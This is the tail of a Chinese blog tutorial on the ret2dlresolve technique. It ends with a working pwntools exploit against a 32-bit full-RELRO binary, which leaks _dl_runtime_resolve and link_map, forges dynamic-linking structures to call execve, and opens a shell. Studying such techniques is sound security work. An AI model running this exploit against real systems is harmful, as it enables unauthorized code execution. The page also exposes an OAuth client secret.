ROP(<span class="hljs-string">"./main_full_relro_32"</span>)<br>    rop.write(<span class="hljs-number">1</span>, dyn_pltgot_ptr_addr, <span class="hljs-number">4</span>)<br>    rop.read(<span class="hljs-number">0</span>, stack_base, <span class="hljs-number">100</span>)<br>    rop.migrate(stack_base)<br>    sh.sendline(rop.chain())<br>    elf_pltgot_ptr_addr = u32(sh.recv(<span class="hljs-number">4</span>))<br>    <br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">"  [*] The address of pltgot_ptr is"</span>, <span class="hljs-built_in">hex</span>(elf_pltgot_ptr_addr))<br>    <br>    <span class="hljs-keyword">if</span> elf_pltgot_ptr_addr == <span class="hljs-number">0</span>:<br>         <span class="hljs-built_in">print</span>(<span class="hljs-string">"  [*] This elf is static linked or full relro"</span>)<br>         <span class="hljs-keyword">continue</span><br>    <br>    stack_base = change_stack_addr(stack_base)<br>    rop = ROP(<span class="hljs-string">"./main_full_relro_32"</span>)<br>    rop.write(<span class="hljs-number">1</span>, elf_pltgot_ptr_addr + <span class="hljs-number">4</span>, <span class="hljs-number">4</span>)<br>    rop.read(<span class="hljs-number">0</span>, stack_base, <span class="hljs-number">100</span>)<br>    rop.migrate(stack_base)<br>    sh.sendline(rop.chain())<br>    real_plt_got_addr = u32(sh.recv(<span class="hljs-number">4</span>))<br>    <br>    stack_base = change_stack_addr(stack_base)<br>    rop = ROP(<span class="hljs-string">"./main_full_relro_32"</span>)<br>    rop.write(<span class="hljs-number">1</span>, real_plt_got_addr + <span class="hljs-number">8</span>, <span class="hljs-number">4</span>)<br>    rop.read(<span class="hljs-number">0</span>, stack_base, <span class="hljs-number">100</span>)<br>    rop.migrate(stack_base)<br>    sh.sendline(rop.chain())<br>    dl_runtime_addr = u32(sh.recv(<span class="hljs-number">4</span>))<br>    <br>    <span class="hljs-keyword">if</span> dl_runtime_addr == <span class="hljs-number">0</span>:<br>         <span class="hljs-built_in">print</span>(<span class="hljs-string">"  [*] This elf is static linked or full relro"</span>)<br>         <span class="hljs-keyword">continue</span><br>    <span class="hljs-keyword">else</span>:<br>         <span class="hljs-built_in">print</span>(<span class="hljs-string">"  [*] Found it! The address of _dl_runtime_resolve() is"</span>, <span class="hljs-built_in">hex</span>(dl_runtime_addr))<br>         is_found = <span class="hljs-literal">True</span><br>         <span class="hljs-keyword">break</span><br><br><span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> is_found:<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">"[*] Attack Failed! Could not find address of _dl_runtime_resolve()."</span>)<br>    exit(<span class="hljs-number">0</span>)<br><br><span class="hljs-comment"># use dl_runtime_addr and link_map_addr</span><br>rop = ROP(<span class="hljs-string">"./main_full_relro_32"</span>)<br>stack_base = bss_addr + <span class="hljs-number">800</span><br>rop.read(<span class="hljs-number">0</span>, stack_base, <span class="hljs-number">100</span>)<br>rop.migrate(stack_base)<br>sh.sendline(rop.chain())<br><br>rel_plt = elf.get_section_by_name(<span class="hljs-string">'.rel.plt'</span>).header.sh_addr<br>dynsym_addr = elf.get_section_by_name(<span class="hljs-string">'.dynsym'</span>).header.sh_addr<br>dynstr_addr = elf.get_section_by_name(<span class="hljs-string">'.dynstr'</span>).header.sh_addr<br><br>write_reloc_offset = stack_base + <span class="hljs-number">28</span> - rel_plt<br>r_offset = stack_base + <span class="hljs-number">36</span><br><br>fake_sym_addr = stack_base + <span class="hljs-number">40</span><br>align = <span class="hljs-number">0x10</span> - ((fake_sym_addr - dynsym_addr) &amp; <span class="hljs-number">0xf</span>)<br>fake_sym_addr += align<br>index_dynsym = (fake_sym_addr - dynsym_addr) // <span class="hljs-number">0x10</span><br>fake_str_addr = fake_sym_addr + <span class="hljs-number">16</span><br>st_name = (fake_str_addr - dynstr_addr)<br>fake_write_sym = flat([st_name, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0x12</span>])<br><br>r_info = (index_dynsym &lt;&lt; <span class="hljs-number">8</span>) + <span class="hljs-number">0x7</span><br><br>rop = ROP(<span class="hljs-string">"./main_full_relro_32"</span>)<br>rop.raw(dl_runtime_addr)<br>rop.raw(link_map_addr)<br>rop.raw(write_reloc_offset)<br>rop.raw(<span class="hljs-string">b'bbbb'</span>)<br>rop.raw(stack_base + <span class="hljs-number">80</span>)<br>rop.raw(<span class="hljs-number">0</span>)<br>rop.raw(<span class="hljs-number">0</span>)<br><br><span class="hljs-comment"># fake .rel.plt [r_offset(fake!), r_info]</span><br>rop.raw(r_offset)<br>rop.raw(r_info)<br>rop.raw(<span class="hljs-string">b'bbbb'</span>)<br><br><span class="hljs-comment"># fake .dynsym entry</span><br>rop.raw(<span class="hljs-string">b'a'</span> * align)<br>rop.raw(fake_write_sym)<br><br><span class="hljs-comment"># fake .dynstr</span><br>rop.raw(<span class="hljs-string">b'execve\x00'</span>)<br><br>rop.raw(<span class="hljs-string">b'a'</span> * (<span class="hljs-number">80</span> - <span class="hljs-built_in">len</span>(rop.chain())))<br>rop.raw(sh_str)<br>sh.sendline(rop.chain())<br><br>sh.interactive()<br></code></pre></td></tr></tbody></table></figure>

<p>运行结果：</p>
<p><img src="/2023/10/13/Ret2dlresolve%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/16.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="link-Reference："><a href="#link-Reference：" class="headerlink" title=":link: Reference："></a><span class="github-emoji"><span>🔗</span><img src="https://github.githubassets.com/images/icons/emoji/unicode/1f517.png?v8" srcset="/img/loading.gif" lazyload aria-hidden="true" onerror="this.parent.classList.add('github-emoji-fallback')"></span> Reference：</h2><ol>
<li><a target="_blank" rel="noopener" href="https://ypl.coffee/dl-resolve/">Understanding _dl_runtime_resolve() - Peilin Ye’s blog (ypl.coffee)</a>  <span class="github-emoji"><span>⭐</span><img src="https://github.githubassets.com/images/icons/emoji/unicode/2b50.png?v8" srcset="/img/loading.gif" lazyload aria-hidden="true" onerror="this.parent.classList.add('github-emoji-fallback')"></span>强烈推荐这一篇文章！！ 不看我真的会哭的~</li>
<li><a target="_blank" rel="noopener" href="https://ctf-wiki.org/executable/elf/linking/symbol-resolve/">Symbol Reslove - CTF Wiki (ctf-wiki.org)</a> 经典文章了</li>
<li>Di Federico, Alessandro, et al. “How the {ELF} Ruined Christmas.” <em>24th USENIX Security Symposium (USENIX Security 15)</em>. 2015.</li>
<li>[link.h source code <a target="_blank" rel="noopener" href="https://codebrowser.dev/glibc/glibc/include/link.h.html#link_map">glibc/include/link.h] - Codebrowser</a></li>
<li>[elf.h source code <a target="_blank" rel="noopener" href="https://codebrowser.dev/glibc/glibc/elf/elf.h.html">glibc/elf/elf.h] - Codebrowser</a></li>
<li><a target="_blank" rel="noopener" href="https://www.testzero-wz.com/2022/03/05/Ret2dlresolve%E2%80%94%E2%80%94%E4%BB%8ENo-RELRO%E5%88%B0FULL-RELRO/#full_relero">Ret2dlresolve攻击——从No RELRO到FULL RELRO | T3stzer0’s Blog (testzero-wz.com)</a></li>
</ol>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">#栈溢出漏洞利用</a>
      
        <a href="/tags/ret2dlresolve/">#ret2dlresolve</a>
      
        <a href="/tags/linux%E5%8A%A8%E6%80%81%E9%93%BE%E6%8E%A5/">#linux动态链接</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Ret2dlresolve攻击解析</div>
      <div>http://bladchan.github.io/2023/10/13/Ret2dlresolve攻击解析/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>bladchan</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年10月13日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/09/18/CVE-2023-38831%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" title="CVE-2023-38831（WinRAR）漏洞分析">
                        <span class="hidden-mobile">CVE-2023-38831（WinRAR）漏洞分析</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="gitalk-container"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#gitalk-container', function() {
      Fluid.utils.createCssLink('/css/gitalk.css')
      Fluid.utils.createScript('https://lib.baomitu.com/gitalk/1.8.0/gitalk.min.js', function() {
        var options = Object.assign(
          {"clientID":"8fb1902edd5e2f4640d4","clientSecret":"c33eb5a729e618f3b25f5ed31b89ab8190617364","repo":"blog_comments","owner":"bladchan","admin":["bladchan"],"language":"zh-CN","labels":["Gitalk"],"perPage":10,"pagerDirection":"last","distractionFreeMode":false,"createIssueManually":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token"},
          {
            id: 'a56baab6170a9a4ecb05fceb5656b633'
          }
        )
        var gitalk = new Gitalk(options);
        gitalk.render('gitalk-container');
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Chan</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Powered by Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
